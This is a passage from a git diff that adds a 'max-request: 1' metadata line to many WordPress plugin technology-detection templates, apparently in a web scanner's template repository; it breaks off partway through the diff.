http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 